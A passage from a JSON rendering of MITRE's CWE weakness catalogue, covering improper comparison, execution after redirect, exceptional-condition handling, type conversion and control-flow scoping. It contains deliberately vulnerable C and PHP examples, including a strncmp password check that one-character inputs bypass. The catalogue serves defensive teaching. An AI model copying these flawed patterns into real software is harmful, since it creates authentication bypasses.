this.model.equals(t.getModel()));","xhtml:br":["","","","","",""]}}}}}},"Body_Text":"Here, the equals() method only checks the make and model of the Truck objects, but the year of manufacture is not included."},{"attr":{"@_Demonstrative_Example_ID":"DX-116"},"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv) {}","xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"if (strncmp(username, inUser, strlen(inUser))) {}if (! strncmp(pass, inPass, strlen(inPass))) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"logEvent(\\"Auth failure of username using strlen of inUser\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth success of password using strlen of inUser\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth fail of password using sizeof\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]},{"#text":"int authResult;if (argc &lt; 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}}]}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"ppapaspass","xhtml:br":["","",""]}}],"Body_Text":["In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application\'s password before determining success.","As a result, this partial comparison leads to improper authentication (CWE-287).","Any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","This significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"a\\" and \\"adm\\" will succeed for the username.","While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness."]}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2016-10003","Description":"Proxy performs incorrect comparison of request headers, leading to infoleak","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10003"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"182"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"41"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"44"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"88"}},{"attr":{"@_CAPEC_ID":"9"}},{"attr":{"@_CAPEC_ID":"92"}}]},"Notes":{"Note":{"#text":"This entry likely has some relationships with case sensitivity (CWE-178), but case sensitivity is a factor in other types of weaknesses besides comparison.  Also, in cryptography, certain attacks are possible when certain comparison operations do not take place in constant time, causing a timing-related information leak (CWE-208).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Insufficient Comparison","attr":{"@_Date":"2018-03-27"}}}},"698":{"attr":{"@_ID":"698","@_Name":"Execution After Redirect (EAR)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application sends a redirect to another location, but instead of exiting, it executes additional code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Alternate_Terms":{"Alternate_Term":{"Term":"Redirect Without Exit"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Other","Confidentiality","Integrity","Availability"],"Impact":["Alter Execution Logic","Execute Unauthorized Code or Commands"],"Note":"This weakness could affect the control flow of the application and allow execution of untrusted code."}},"Detection_Methods":{"Detection_Method":{"Method":"Black Box","Description":"This issue might not be detected if testing is performed using a web browser, because the browser might obey the redirect and move the user to a different page before the application has produced outputs that indicate something is amiss."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code queries a server and displays its status when a request comes from an authorized IP address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$requestingIP = $_SERVER[\'REMOTE_ADDR\'];if(!in_array($requestingIP,$ipAllowList)){}$status = getServerStatus();echo $status;","xhtml:br":["","","","",""],"xhtml:div":{"#text":"echo \\"You are not authorized to view this page\\";http_redirect($errorPageURL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:i":"..."}},"Body_Text":"This code redirects unauthorized users, but continues to execute code after calling http_redirect(). This means even unauthorized users may be able to access the contents of the page or perform a DoS attack on the server being queried. Also, note that this code is vulnerable to an IP address spoofing attack (CWE-212)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-1402","Description":"Execution-after-redirect allows access to application configuration details.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1402"},{"Reference":"CVE-2009-1936","Description":"chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936"},{"Reference":"CVE-2007-2713","Description":"Remote attackers can obtain access to administrator functionality through EAR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713"},{"Reference":"CVE-2007-4932","Description":"Remote attackers can obtain access to administrator functionality through EAR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4932"},{"Reference":"CVE-2007-5578","Description":"Bypass of authentication step through EAR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5578"},{"Reference":"CVE-2007-2713","Description":"Chain: Execution after redirect triggers eval injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713"},{"Reference":"CVE-2007-6652","Description":"chain: execution after redirect allows non-administrator to perform static code injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6652"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-565"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Name, Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Redirect Without Exit","attr":{"@_Date":"2013-02-21"}}}},"703":{"attr":{"@_ID":"703","@_Name":"Improper Check or Handling of Exceptional Conditions","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly anticipate or handle exceptional conditions that rarely occur during normal operation of the software.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Availability","Integrity"],"Impact":["Read Application Data","DoS: Crash, Exit, or Restart","Unexpected State"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fault Injection - source code","Fault Injection - binary"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Forced Path Execution"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR06-J","Entry_Name":"Do not throw undeclared checked exceptions"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-567"}},{"attr":{"@_External_Reference_ID":"REF-568"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 8: C++ Catastrophes.&#34; Page 143"}}]},"Notes":{"Note":{"#text":"This is a high-level class that might have some overlap with other classes. It could be argued that even \\"normal\\" weaknesses such as buffer overflows involve unusual or exceptional conditions. In that sense, this might be an inherent aspect of most other weaknesses within CWE, similar to API Abuse (CWE-227) and Indicator of Poor Code Quality (CWE-398). However, this entry is currently intended to unify disparate concepts that do not have other places within the Research Concepts view (CWE-1000).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Handle Exceptional Conditions","attr":{"@_Date":"2010-12-13"}}}},"704":{"attr":{"@_ID":"704","@_Name":"Incorrect Type Conversion or Cast","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not correctly convert an object, resource, or structure from one type to a different type.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP05-C","Entry_Name":"Do not cast away a const qualification"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT36-C","Entry_Name":"Converting a pointer to integer or integer to pointer","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR34-C","Entry_Name":"Cast characters to unsigned types before converting to larger integer sizes","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR37-C","Entry_Name":"Arguments to character handling functions must be representable as an unsigned char","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-704"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-704"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"705":{"attr":{"@_ID":"705","@_Name":"Incorrect Control Flow Scoping","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly return control flow to the proper location after it has completed a task or detected an unusual condition.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Alter Execution Logic","Other"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -&gt; CWE-561 (Dead Code) -&gt; CWE-295 (Improper Certificate Validation) -&gt; CWE-393 (Return of Wrong Status Code) -&gt; CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV32-C","Entry_Name":"All exit handlers must return normally","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR04-C","Entry_Name":"Choose an appropriate termination strategy"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"THI05-J","Entry_Name":"Do not use Thread.stop() to terminate threads"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR04-J","Entry_Name":"Do not complete abruptly from a finally block"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Imprecise"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"706":{"attr":{"@_ID":"706","@_Name":"Use of Incorrectly-Resolved Name or Reference","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"99","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"159"}},{"attr":{"@_CAPEC_ID":"177"}},{"attr":{"@_CAPEC_ID":"48"}},{"attr":{"@_CAPEC_ID":"641"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 